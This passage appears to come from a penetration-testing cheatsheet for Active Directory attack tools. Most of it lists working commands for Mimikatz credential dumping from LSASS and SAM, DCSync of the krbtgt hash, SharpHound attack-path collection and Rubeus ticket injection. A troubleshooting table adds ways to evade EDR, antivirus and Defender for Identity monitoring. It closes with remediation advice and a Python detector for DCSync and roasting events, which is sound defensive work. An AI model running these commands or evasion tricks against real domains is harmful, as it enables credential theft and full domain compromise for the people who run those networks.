SharpHound: collect all AD data: `SharpHound.exe -c All --zipfilename loot.zip`
BloodHound: import zip, mark owned, find shortest path to DA

## Operational Context

Use when: AD foothold obtained and lateral movement or privilege escalation requires specialized tooling: Mimikatz for credential extraction, Rubeus for Kerberos manipulation, Impacket for remote operations from Linux, BloodHound/SharpHound for attack path mapping.

Think Dumber First: Before any tool: `whoami /priv` (need SeDebugPrivilege for Mimikatz), `klist` (see existing tickets), `nxc smb [DC] -u [USER] -p [PASS]` (confirm access). Match the tool to the current task: Rubeus for Kerberos-only, Mimikatz for in-memory credentials, Impacket for Linux-to-Windows ops.

Skip when: EDR is active. Default Mimikatz and SharpHound signatures are well-known; use nxc/impacket alternatives that generate less detection noise.

## Tactical Cheatsheet

### Mimikatz: In-Memory Credential Extraction
| Command | Tactical Outcome |
|---|---|
| `privilege::debug` | Enable SeDebugPrivilege for LSASS access |
| `sekurlsa::logonpasswords` | Dump NTLM hashes + plaintext creds from LSASS |
| `sekurlsa::tickets /export` | Export all Kerberos tickets from LSASS to .kirbi files |
| `lsadump::sam` | Dump SAM database hashes (requires SYSTEM) |
| `lsadump::dcsync /user:krbtgt /domain:[DOMAIN]` | DCSync to get krbtgt hash (requires replication rights) |
```
# Full collection: most complete, most noisy
SharpHound.exe -c All --zipfilename loot.zip --outputdirectory C:\Temp\

# Stealth collection: DC only, no workstation session queries
SharpHound.exe -c DCOnly,LoggedOn --zipfilename loot.zip

# Target specific domain
SharpHound.exe -c All -d [DOMAIN] --domaincontroller [DC_FQDN] --zipfilename loot.zip

# After import, key BloodHound GUI actions:
# 1. Analysis -> Find Shortest Paths to Domain Admins
# 2. Analysis -> Find Kerberoastable Users with most privileges
# 3. Analysis -> Find AS-REP Roastable Users
# 4. Mark owned users/computers: right-click -> Mark as Owned
# 5. Node -> Reachable High Value Targets from owned node
```
## Troubleshooting & Edge Cases

| Problem | Cause | Fix |
|---|---|---|
| Mimikatz `privilege::debug` fails | Not admin or PPL active | Elevate to SYSTEM first; for PPL use `!+` to load driver bypass |
| Rubeus kerberoast returns 0 hashes | No SPN accounts or wrong DC | Verify: `impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC]` from Linux |
| impacket-psexec access denied | ADMIN$ not writable or blocked | Try wmiexec or smbexec; confirm `nxc smb [TARGET]` shows `Pwn3d!` |
| DCSync blocked by MDI | Replication traffic monitored | Use VSS shadow copy method instead; less detectable |
| SharpHound detected by AV | Known binary signature | Use bloodhound-python from Linux or `nxc --bloodhound`; no binary on target |
| BloodHound import fails | Version mismatch (CE vs Legacy) | Match SharpHound version to BloodHound version; CE needs SharpHound 2.x |
| Ticket from Rubeus won't inject | Already have conflicting ticket | `klist purge` first, then `Rubeus.exe ptt /ticket:[BASE64]` |
| impacket clock skew error | Time not synced with DC | `ntpdate -u [DC_IP]` then retry Kerberos operations |
## Reporting Trigger

Finding Title: AD Attack Tool Execution: Credential Extraction and Kerberos Abuse

Impact: Use of Mimikatz, Rubeus, and the Impacket suite demonstrates that an attacker with initial AD access can systematically extract all domain credentials, manipulate Kerberos tickets, and achieve remote code execution across all Windows hosts, escalating a single compromised account to complete domain ownership.
Root Cause: Multiple compounding AD security deficiencies: no Credential Guard (allows LSASS dump), weak service account passwords (Kerberoasting), no MDI monitoring (DCSync undetected), and NTLM acceptance enabling Pass-the-Hash.
Recommendation: Deploy Credential Guard on all endpoints. Implement MDI to detect Mimikatz, DCSync, and Rubeus patterns. Use gMSA for all service accounts. Enforce MFA for privileged accounts. Harden LSASS with PPL (RunAsPPL). Disable NTLMv1 and monitor NTLMv2 usage.
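The detection side of the Recommendation above, as an added example that is not part of the original cheatsheet: a small Python scanner that flags the three tool behaviours this page tells defenders to monitor for (DCSync, Kerberoasting, AS-REP roasting) in Windows Security-log records. Events are modelled as dicts whose keys mirror the real 4662/4768/4769 EventData fields; the `DC_ACCOUNTS` allow-list, the `KERBEROAST_THRESHOLD` value and every record in `SAMPLE_EVENTS` are assumptions constructed for the example.

```python
# Added example, not part of the original cheatsheet.
# Flags DCSync, Kerberoasting and AS-REP roasting patterns in Security-log
# records represented as dicts. Field names mirror the real 4662/4768/4769
# EventData; DC_ACCOUNTS, the threshold and SAMPLE_EVENTS are constructed.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Control-access rights a DCSync must exercise on the domain naming context.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

RC4_HMAC = "0x17"          # weak etype that roasting tools request
KERBEROAST_THRESHOLD = 3   # distinct RC4 service tickets per account (assumed)


@dataclass(frozen=True)
class Alert:
    rule: str
    account: str
    detail: str


def detect_dcsync(events: Iterable[Dict], dc_accounts: Set[str]) -> List[Alert]:
    """4662 carrying a replication right, from a principal that is not a known DC."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_RIGHTS):
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in dc_accounts:
            continue  # DC-to-DC replication is expected traffic
        alerts.append(Alert("dcsync", subject,
                            "replication right exercised by a non-DC principal"))
    return alerts


def detect_kerberoast(events: Iterable[Dict],
                      threshold: int = KERBEROAST_THRESHOLD) -> List[Alert]:
    """4769: one account requesting RC4 service tickets for several user SPNs."""
    per_account = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the TGS itself are not roast targets
        per_account[ev["TargetUserName"]].add(svc)
    return [Alert("kerberoast", acct, f"RC4 TGS for {len(svcs)} services: {sorted(svcs)}")
            for acct, svcs in per_account.items() if len(svcs) >= threshold]


def detect_asrep_roast(events: Iterable[Dict]) -> List[Alert]:
    """4768 with Pre-Authentication Type 0: a TGT issued without pre-auth."""
    return [Alert("asrep_roast", ev["TargetUserName"], "TGT issued without pre-authentication")
            for ev in events
            if ev.get("EventID") == 4768 and ev.get("PreAuthType") == "0"]


def run_all(events: List[Dict], dc_accounts: Set[str]) -> List[Alert]:
    return (detect_dcsync(events, dc_accounts)
            + detect_kerberoast(events)
            + detect_asrep_roast(events))


# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "TargetUserName": "legacy_app", "PreAuthType": "0"},
    {"EventID": 4768, "TargetUserName": "asmith", "PreAuthType": "2"},
]
DC_ACCOUNTS = {"DC01$", "DC02$"}

if __name__ == "__main__":
    for a in run_all(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"[{a.rule}] {a.account}: {a.detail}")
```

On the sample set this raises one alert per rule: `jdoe` using a replication right from a non-DC account, `jdoe@CORP.LOCAL` collecting RC4 tickets for three user-account SPNs (the `WS01$` machine ticket is ignored), and `legacy_app` receiving a TGT without pre-authentication. The AES-encrypted request from `asmith` and the DC01$ replication event are left alone, which is the point of the allow-list and etype filters: the same fields MDI keys on, without the noise.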